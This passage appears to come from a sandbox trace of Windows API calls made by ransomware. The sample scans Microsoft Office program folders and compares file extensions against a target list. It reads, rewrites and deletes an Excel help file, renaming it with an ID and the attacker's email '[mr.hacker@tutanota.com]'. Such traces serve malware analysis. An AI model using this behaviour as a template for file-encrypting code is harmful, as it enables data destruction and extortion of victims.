office\\office14\\1033\\eawfintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eawfintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.379] lstrlenW (lpString=".doc") returned 4 [0272.379] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString=".docx") returned 5 [0272.379] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.379] lstrlenW (lpString=".pdf") returned 4 [0272.379] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString=".xls") returned 4 [0272.379] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString=".xlsx") returned 5 [0272.379] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.379] lstrlenW (lpString=".ppt") returned 4 [0272.379] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.379] lstrlenW (lpString=".zip") returned 4 [0272.379] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString=".rar") returned 4 [0272.379] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.379] lstrlenW (lpString=".bz2") returned 4 [0272.379] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.379] lstrlenW (lpString=".7z") returned 3 [0272.379] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.379] lstrlenW (lpString=".dbf") returned 4 [0272.380] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.380] lstrlenW (lpString=".1cd") returned 4 [0272.380] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.380] lstrlenW (lpString=".jpg") returned 4 [0272.380] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.380] lstrlenW (lpString=".doc") returned 4 [0272.380] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString=".docx") returned 5 [0272.380] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.380] lstrlenW (lpString=".pdf") returned 4 [0272.380] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString=".xls") returned 4 [0272.380] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString=".xlsx") returned 5 [0272.380] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.380] lstrlenW (lpString=".ppt") returned 4 [0272.380] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.380] lstrlenW (lpString=".zip") returned 4 [0272.380] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString=".rar") returned 4 [0272.380] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.380] lstrlenW (lpString=".bz2") returned 4 [0272.380] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.380] lstrlenW (lpString=".7z") returned 3 [0272.380] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.380] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.381] lstrlenW (lpString=".dbf") returned 4 [0272.381] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.381] lstrlenW (lpString=".1cd") returned 4 [0272.381] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.381] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EAWFINTL.DLL") returned 60 [0272.381] lstrlenW (lpString=".jpg") returned 4 [0272.381] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.381] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.381] lstrlenW (lpString="EDITRES.DLL") returned 11 [0272.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.381] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=19840) returned 1 [0272.381] CloseHandle (hObject=0x3b4) returned 1 [0272.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll")) returned 0x20 [0272.381] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\editres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.382] lstrlenW (lpString=".doc") returned 4 [0272.382] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString=".docx") returned 5 [0272.382] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.382] lstrlenW (lpString=".pdf") returned 4 [0272.382] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString=".xls") returned 4 [0272.382] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString=".xlsx") returned 5 [0272.382] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.382] lstrlenW (lpString=".ppt") returned 4 [0272.382] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.382] lstrlenW (lpString=".zip") returned 4 [0272.382] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString=".rar") returned 4 [0272.382] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.382] lstrlenW (lpString=".bz2") returned 4 [0272.382] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.382] lstrlenW (lpString=".7z") returned 3 [0272.382] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.382] lstrlenW (lpString=".dbf") returned 4 [0272.382] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.382] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.382] lstrlenW (lpString=".1cd") returned 4 [0272.382] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString=".jpg") returned 4 [0272.383] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString=".doc") returned 4 [0272.383] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString=".docx") returned 5 [0272.383] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0272.383] lstrlenW (lpString=".pdf") returned 4 [0272.383] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString=".xls") returned 4 [0272.383] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString=".xlsx") returned 5 [0272.383] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0272.383] lstrlenW (lpString=".ppt") returned 4 [0272.383] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString=".zip") returned 4 [0272.383] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString=".rar") returned 4 [0272.383] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.383] lstrlenW (lpString=".bz2") returned 4 [0272.383] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.383] lstrlenW (lpString=".7z") returned 3 [0272.383] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString=".dbf") returned 4 [0272.383] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.383] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.383] lstrlenW (lpString=".1cd") returned 4 [0272.384] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EDITRES.DLL") returned 59 [0272.384] lstrlenW (lpString=".jpg") returned 4 [0272.384] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.384] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0272.384] lstrlenW (lpString="EntityPickerIntl.dll") returned 20 [0272.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.384] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=24456) returned 1 [0272.384] CloseHandle (hObject=0x3b4) returned 1 [0272.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll")) returned 0x20 [0272.384] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.384] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.384] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString=".doc") returned 4 [0272.385] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString=".docx") returned 5 [0272.385] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0272.385] lstrlenW (lpString=".pdf") returned 4 [0272.385] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString=".xls") returned 4 [0272.385] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString=".xlsx") returned 5 [0272.385] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0272.385] lstrlenW (lpString=".ppt") returned 4 [0272.385] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString=".zip") returned 4 [0272.385] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString=".rar") returned 4 [0272.385] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.385] lstrlenW (lpString=".bz2") returned 4 [0272.385] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.385] lstrlenW (lpString=".7z") returned 3 [0272.385] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString=".dbf") returned 4 [0272.385] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString=".1cd") returned 4 [0272.385] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.385] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.385] lstrlenW (lpString=".jpg") returned 4 [0272.690] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.690] lstrlenW (lpString=".doc") returned 4 [0272.690] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString=".docx") returned 5 [0272.690] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0272.690] lstrlenW (lpString=".pdf") returned 4 [0272.690] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString=".xls") returned 4 [0272.690] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString=".xlsx") returned 5 [0272.690] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0272.690] lstrlenW (lpString=".ppt") returned 4 [0272.690] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.690] lstrlenW (lpString=".zip") returned 4 [0272.690] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString=".rar") returned 4 [0272.690] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.690] lstrlenW (lpString=".bz2") returned 4 [0272.690] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.690] lstrlenW (lpString=".7z") returned 3 [0272.690] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.690] lstrlenW (lpString=".dbf") returned 4 [0272.691] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.691] lstrlenW (lpString=".1cd") returned 4 [0272.691] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68 [0272.691] lstrlenW (lpString=".jpg") returned 4 [0272.691] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.691] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0272.691] lstrlenW (lpString="EXCEL.DEV_COL.HXT") returned 17 [0272.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0272.727] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=209) returned 1 [0272.727] CloseHandle (hObject=0x3a4) returned 1 [0272.727] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt")) returned 0x20 [0272.910] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.911] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.911] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.911] GetLastError () returned 0x0 [0272.911] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0xd1, lpOverlapped=0x0) returned 1 [0272.912] WriteFile (in: hFile=0x328, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0272.913] ReadFile (in: hFile=0x39c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.913] WriteFile (in: hFile=0x328, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0272.913] SetEndOfFile (hFile=0x328) returned 1 [0272.913] CloseHandle (hObject=0x328) returned 1 [0272.913] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.913] SetEndOfFile (hFile=0x39c) returned 1 [0272.916] CloseHandle (hObject=0x39c) returned 1 [0272.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.918] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev_col.hxt")) returned 1 [0272.918] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString=".doc") returned 4 [0272.919] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0272.919] lstrlenW (lpString=".docx") returned 5 [0272.919] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0272.919] lstrlenW (lpString=".pdf") returned 4 [0272.919] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0272.919] lstrlenW (lpString=".xls") returned 4 [0272.919] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0272.919] lstrlenW (lpString=".xlsx") returned 5 [0272.919] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0272.919] lstrlenW (lpString=".ppt") returned 4 [0272.919] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0272.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString=".zip") returned 4 [0272.919] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0272.919] lstrlenW (lpString=".rar") returned 4 [0272.919] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0272.919] lstrlenW (lpString=".bz2") returned 4 [0272.919] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0272.919] lstrlenW (lpString=".7z") returned 3 [0272.919] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0272.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString=".dbf") returned 4 [0272.919] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0272.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString=".1cd") returned 4 [0272.919] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0272.919] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.919] lstrlenW (lpString=".jpg") returned 4 [0272.919] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString=".doc") returned 4 [0272.920] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0272.920] lstrlenW (lpString=".docx") returned 5 [0272.920] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0272.920] lstrlenW (lpString=".pdf") returned 4 [0272.920] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString=".xls") returned 4 [0272.920] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString=".xlsx") returned 5 [0272.920] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0272.920] lstrlenW (lpString=".ppt") returned 4 [0272.920] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString=".zip") returned 4 [0272.920] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString=".rar") returned 4 [0272.920] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0272.920] lstrlenW (lpString=".bz2") returned 4 [0272.920] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0272.920] lstrlenW (lpString=".7z") returned 3 [0272.920] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString=".dbf") returned 4 [0272.920] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString=".1cd") returned 4 [0272.920] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0272.920] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV_COL.HXT") returned 65 [0272.920] lstrlenW (lpString=".jpg") returned 4 [0272.920] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0272.921] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0272.921] lstrlenW (lpString="EXCEL_COL.HXT") returned 13 [0272.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.921] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=205) returned 1 [0272.921] CloseHandle (hObject=0x39c) returned 1 [0272.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt")) returned 0x20 [0272.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0272.921] SetFilePointerEx 